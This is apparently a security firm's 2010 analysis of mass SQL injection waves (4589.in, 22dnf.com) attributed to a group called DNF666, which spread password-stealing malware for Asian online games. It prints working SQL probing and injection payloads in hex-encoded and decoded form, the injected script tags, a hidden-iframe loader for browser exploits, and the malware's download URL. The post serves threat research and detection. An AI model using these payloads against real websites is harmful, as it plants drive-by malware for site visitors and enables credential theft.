The DNF group is back--Mass SQL injections 4589.in and 22dnf.com

(Credits: Wayne Huang, Chris Hsiao, Crane Ku, and other members of Armorize)
On June 13th, we blogged about on-going mass SQL injections attempts spreading drive-by downloads based on CVE-2010-1297. Based on our analysis, we concluded that these recent waves were by the same "DNF666" group. Well, just a day after we blogged, they launched it again, and yesterday, again. So here's our analysis.

Previously (see previous blog post):

Mar 7th: dnf666.net Mass SQL attack
Jun 4th: Adobe released advisory.
Jun 7th: POC code widely available.
Jun 8th: robint.us--First wave mass SQL injection, in which the drive-by download leverages this particular exploit, took place.
Jun 10th: Metasploit version available.
Jun 11th: 2677.in--Second wave of mass SQL injection took place.

We've labeled this attacker group "DNF666." Yes, Wall Street Journal was hit by robint.us and yes, so was Jerusalem Post. And yes, more than 114,000 pages were infected, and yes, all of this was just to spread malware that steal passwords to Asian online games.

Well, then they should have just targeted websites in China and Taiwan.

That's what they did recently:

Time is Taipei time (GMT+8)
Jun 14th: 4589.in mass SQL injection
Jun 30th: 22dnf.com mass SQL injection

A quick summary:

Similarities:
1. Same group DNF666
2. Same drive-by kit used--CuteQQ / Anhey
3. Same objective--steal passwords to Asian online games

Differences:
1. New probing scripts before SQL injection
2. Server-side attack targets both ASP and ASP.NET websites
3. Client-side attack targets different vulnerabilities (CVE-2010-0806 and CVE-2010-0249).
4. Targets only Asian websites

[1. Server-side]

In both attempts, we saw new probing requests (thanks to SmartWAF team Wisely and Crane):
' aND '8'='8
' aND '8'='3
'/**/aND/**/'8'='8
'/**/aND/**/'8'='3
%' aND '8%'='8
%' aND '8%'='3
%' aND '8'='8
%' aND '8%'='3
%'/**/aND/**/'8'='8
%'/**/aND/**/'8%'='3
' XoR '8'='3
' XoR '8'='8
' XoR '8'='3
' XoR '8'='8
'/**/XoR/**/'8'='3
'/**/XoR/**/'8'='8


The SQL injection strings themselves are as usual:
4589.in sample:
GET /default.aspx?imgbtnlogin=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420612E6E416D452C622E6E416D452046724F6D207359734F624A6543745320612C735973436F4C754D6E53206220774865526520612E69443D622E694420416E4420612E78547950653D27752720416E442028622E78547950653D3939206F5220622E78547950653D3335206F5220622E78547950653D323331206F5220622E78547950653D31363729206F50654E207441624C655F637572736F52206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C4063207768696C6528404066457443685F7374617475733D302920624567496E20657865632827557044615465205B272B40742B275D20734574205B272B40632B275D3D727472696D28636F6E7665727428766172636861722838303030292C5B272B40632B275D29292B6341735428307833433733363337323639373037343230373337323633334436383734373437303341324632463334333533383339324536393645324637393631363836463646324536413733334533433246373336333732363937303734334520615320764172436841722835302929207768657265205B272B40632B275D206E6F74206C696B6520272725343538392E696E2527272729206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C406320654E6420634C6F5365207441624C655F637572736F52206445416C4C6F43615465207441624C655F637572736F523B2D2D%20eXeC(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt

22dnf.com:
GET /default.aspx?imgbtnlogin=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420612E6E416D452C622E6E416D452046724F6D207359734F624A6543745320612C735973436F4C754D6E53206220774865526520612E69443D622E694420416E4420612E78547950653D27752720416E442028622E78547950653D3939206F5220622E78547950653D3335206F5220622E78547950653D323331206F5220622E78547950653D31363729206F50654E207441624C655F637572736F52206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C4063207768696C6528404066457443685F7374617475733D302920624567496E20657865632827557044615465205B272B40742B275D20734574205B272B40632B275D3D727472696D28636F6E7665727428766172636861722838303030292C5B272B40632B275D29292B63417354283078334337333633373236393730373432303733373236333344363837343734373033413246324633323332363436453636324536333646364432463636363632463739324536413733334533433246373336333732363937303734334520615320764172436841722835312929207768657265205B272B40632B275D206E6F74206C696B65202727253232646E662527272729206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C406320654E6420634C6F5365207441624C655F637572736F52206445416C4C6F43615465207441624C655F637572736F523B2D2D%20eXeC(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt

Decoded, 4589.in:
get /default.aspx?imgbtnlogin=1;declare @s varchar(8000) set @sdeclare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cast(0x3c736372697074207372633d687474703a2f2f343538392e696e2f7961686f6f2e6a733e3c2f7363726970743e as varchar(50)) where ['+@c+'] not like ''%4589.in%''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;-- exec(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt

22dnf:
get /default.aspx?imgbtnlogin=1;declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cast(0x3c736372697074207372633d687474703a2f2f3232646e662e63 6f6d2f66662f792e6a733e3c2f7363726970743e as varchar(51)) where ['+@c+'] not like ''%22dnf%''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;--exec(@s)--&txtmh_card=1&txtpass=1&__viewstate=ddwxmzk4nt


Nothing new in the SQL injection strings, but this time, the group has:

A. Implemented new probing requests
B. Targeted vulnerable IIS+ASP and IIS+ASP.NET websites.
C. Targeted only Asian websites.


4859.in SQL injections came from IP: 95.211.130.71, which reverses to two domains: 4859.in, and iamcome.in. iamcome.in was used in the previous attempt by this group (DNF666). This is the first indication that these two attempts are associated with DNF666.

22dnf.com SQL injections came from 204.74.216.42, which is owned by rashost.com (DNS: 204-74-216-42.vps.rashost.com) based in Beijing. The name "22dnf" (has "dnf") and the hosting, are the second indication that these attempts are associated with DNF666.

Here are screenshots of infections
4589.in:

22dnf.in:

The injected snippets:
4589.in (note in the previous 2677.in effort that took place on Jun 11th, the js filename was also "yahoo.js"):
<script src=http://4589.in/yahoo.js></script>

And for yesterday's 22dnf.in:
<script src=http://22dnf.com/ff/y.js></script>

Actually, because the attack methods were exactly the same, many sites were infected twice:

[2. Client-side]

Let's focus on yesterday's mass SQL injection--22dnf.com. Below is y.js:
try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w\W)*\>/,"");document.write("<iframe src=http://22dnf.com/ff/cc.html width=0 height=0></iframe><iframe src=http://22dnf.com/ff/ie.html width=0 height=0></iframe><iframe src=http://22dnf.com/ff/ad.html width=0 height=0></iframe>");}

So y.js loads three htmls--cc.html, ie.html, and ad.html. cc.html loads cnzz.com as a visitor counter service, ie.html is exploit for CVE-2010-0806, and ad.html is exploit for CVE-2010-0249.

ie.html incorporates a DOM-based trick in order to circumvent automated Web malware (drive-by download) detection techniques such as our HackAlert. Exploitation is triggered based on a DOM object:
<button id="bo" onclick="payload();" STYLE="DISPLAY:NONE"></button>
...
document.getElementById("bo").onclick();

cc.html incorporates a similar DOM-based trick--the exploitation procedure evl() is triggered based on an onload event of an img object:
<img src="XIGUA.GIF" onload="ev1(event)">

Both tricks can effectively defeat automated "behavior-based" scanners that implements only the javascript engine but not the DOM--for example, implementations based purely on SpiderMonkey or Rhino.

The actual shellcode is stored and loaded from ff/a.gif--a common technique to introduce flexibility and also to circumvent detection. This drive-by download was obviously also created by the CuteQQ / Anhey drive-by kit, which marks the third indication that this attempt is by DNF666.

After successful exploitation, the shellcode drops s.exe, which loads commands from 202.109.143.79:81/s.txt. s.txt has the following content:
123
http://202.109.143.79:81/ma.exe

s.exe therefore downloads ma.exe.

[3. Actual malware]

Our analysis concludes that ma.exe is almost the exact same password stealer as all previous attempts, and steals passwords to the following online games:

aion.plaync.co.kr
aion.plaync.jp
df.nexon.com
maplestory.nexon.com

[4. Conclusion]

We thus conclude that these two attempts were made by the same group DNF666, who was responsible for at least three previous mass SQL injection attacks. Summary of this wave:

Similarities:
1. Same group DNF666
2. Same drive-by kit used--CuteQQ / Anhey
3. Same objective--steal passwords to Asian online games

Differences:
1. New probing scripts before SQL injection
2. Server-side attack targets both ASP and ASP.NET websites
3. Client-side attack targets different vulnerabilities (CVE-2010-0806 and CVE-2010-0249).

Timeline:

Mar 7th: dnf666.net Mass SQL attack
Jun 4th: Adobe released advisory.
Jun 7th: POC code widely available.
Jun 8th: robint.us--First wave mass SQL injection, in which the drive-by download leverages this particular exploit, took place.
Jun 10th: Metasploit version available.
Jun 11th: 2677.in--Second wave of mass SQL injection took place.
Jun 14th: 4589.in mass SQL injection
Jun 30th: 22dnf.com mass SQL injection

0 comments:

Post a Comment